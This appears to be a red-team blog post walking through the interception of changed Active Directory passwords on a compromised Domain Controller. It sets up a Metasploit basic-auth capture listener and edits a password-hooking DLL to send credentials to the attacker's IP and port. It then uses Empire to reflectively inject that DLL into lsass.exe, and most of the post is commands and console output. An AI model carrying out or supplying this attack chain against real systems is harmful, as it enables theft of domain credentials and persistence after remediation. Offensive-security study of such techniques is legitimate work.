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Intercepting passwords with Empire and winning!

Reading time ~6 min

This is my password,” said the King as he drew his sword. “The light is dawning, the lie broken. Now guard thee, miscreant, for I am Tirian of Narnia.
C.S. Lewis

tl;dr  You are part of the red team who’s just compromised the entire AD infrastructure. The blue team quickly changes the password, which is always recommended, but is this effective in preventing the red team from still inflicting damage?

This blog post is about intercepting those changed passwords DLL injection and password hooking. Some things you need to be aware of: if injecting the compiled DLL into memory, it’s a fragile approach that only works on x64 systems. Attempting it on x32 systems will result in the Domain Controller crashing (first rule of pwnage club: don’t get caught or be seen)


Setting up the HTTP Client Basic Authentication Credential Collector


1 dollop of Metasploit
A sprinkle of network connectivity
A pinch of creativity to capture basic authentication credentials

msf exploit(psexec) > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)

As usual change the following settings to match your environment:

msf auxiliary(http_basic) > set SRVHOST
msf auxiliary(http_basic) > set SRVPORT 8085
SRVPORT => 8085
msf auxiliary(http_basic) > set URIPATH /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) > 
[*] Listening on
[*] Using URL:
[*] Server started.

The Project

First things first, you need to grab the source code from here (All credits go to their respective authors [1][2])

You’ll need to slightly modify some chunks of code, specifically make sure you change the snippet and match your local IP address and the port here to the one that you’ll use in metasploit to gather the credentials!

Once you’ve done that compile and save the HookPasswordChange.dll to your local machine. Make sure you link it statically like below:

Linking the DLL statically
Linking the DLL statically

and use the Release x64 version or else you will get the following error when trying to inject it:

Victim missing the C++ runtime files.
Victim missing the C++ runtime files.


After you’ve compromised the system, make sure you are using a high integrity agent as depicted below:

Running Empire with a Domain Admin account!
Running Empire with a pawned DA agent!

Now use the following command to inject the sneaky DLL:

(Empire: agents) > usemodule code_execution/invoke_reflectivepeinjection

(Empire: code_execution/invoke_reflectivepeinjection) > options

           Name: Invoke-ReflectivePEInjection
         Module: code_execution/invoke_reflectivepeinjection
     NeedsAdmin: False
      OpsecSafe: True
   MinPSVersion: 2
     Background: False
OutputExtension: None


  Uses PowerSploit's Invoke-ReflectivePEInjection to
  reflectively load a DLL/EXE in to the PowerShell process or
  reflectively load a DLL in to a remote process.


  Name         Required    Value                     Description
  ----         --------    -------                   -----------
  ProcId       False                                 Process ID of the process you want to   
                                                     inject a Dll into.                      
  ComputerName False                                 Optional an array of computernames to   
                                                     run the script on.                      
  DllPath      False                                 (Attacker) local path for the PE/DLL to 
  ExeArgs      False                                 Optional arguments to pass to the       
                                                     executable being reflectively loaded.   
  PEUrl        False                                 A URL containing a DLL/EXE to load and  
  Agent        True        None                      Agent to run module on.

Now run the ps command to grab the process id of lsass.exe

(Empire: agents) > back
(Empire: SimosDAPawned) > ps
(Empire: SimosDAPawned) > 
ProcessName                 PID Arch            UserName        MemUsage       
-----------                 --- ----            --------        --------       
Idle                          0 x64             N/A             0.02 MB        
System                        4 x64             N/A             0.29 MB        
vds                         144 x64             NT AUTHORITY\SY 7.54 MB        
smss                        280 x64             NT AUTHORITY\SY 1.00 MB        
explorer                    308 x64             MAEMO\Symeon    45.01 MB       
csrss                       352 x64             NT AUTHORITY\SY 4.39 MB        
wininit                     404 x64             NT AUTHORITY\SY 4.27 MB        
csrss                       412 x64             NT AUTHORITY\SY 3.60 MB        
winlogon                    452 x64             NT AUTHORITY\SY 4.08 MB        
svchost                     488 x64             NT AUTHORITY\SY 9.66 MB        
services                    500 x64             NT AUTHORITY\SY 10.09 MB       
lsass                       508 x64             NT AUTHORITY\SY 110.00 MB        
                                                STEM <== We're looking for this process ID                        
--- cut ---

Make *sure* to inject only the lsass.exe process since this is where the PasswordChangeNotify lies
– any other process will fail.

(Empire: code_execution/invoke_reflectivepeinjection) > set ProcId 508

Continuing, set up the DllPath to your local location – you can also use the PEUrl feature and let Empire download it for you:

(Empire: code_execution/invoke_reflectivepeinjection) > set DllPath /home/symeon/Downloads/HookPasswordChange.dll

Confirm that you have all the bits together:

(Empire: code_execution/invoke_reflectivepeinjection) > options

           Name: Invoke-ReflectivePEInjection
         Module: code_execution/invoke_reflectivepeinjection
     NeedsAdmin: False
      OpsecSafe: True
   MinPSVersion: 2
     Background: False
OutputExtension: None


  Uses PowerSploit's Invoke-ReflectivePEInjection to
  reflectively load a DLL/EXE in to the PowerShell process or
  reflectively load a DLL in to a remote process.


  Name         Required    Value                     Description
  ----         --------    -------                   -----------
  ProcId       False       508                       Process ID of the process you want to   
                                                     inject a Dll into.                      
  ComputerName False                                 Optional an array of computernames to   
                                                     run the script on.                      
  DllPath      False       /home/symeon/Downloads/H  (Attacker) local path for the PE/DLL to 
                           ookPasswordChange.dll     load.                                   
  ExeArgs      False                                 Optional arguments to pass to the       
                                                     executable being reflectively loaded.   
  PEUrl        False                                 A URL containing a DLL/EXE to load and  
  Agent        True        SimosDAPawned             Agent to run module on. 

Now, cross your fingers and fire it up:

(Empire: code_execution/invoke_reflectivepeinjection) > run
(Empire: code_execution/invoke_reflectivepeinjection) > back

…and hopefully nothing should happen! However ..

DLL injection at its best!
DLL injection at its best!

Works flawlessly! No more pass-the-hash, clear text shiny passwords on your console!


[1] http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
[2] https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/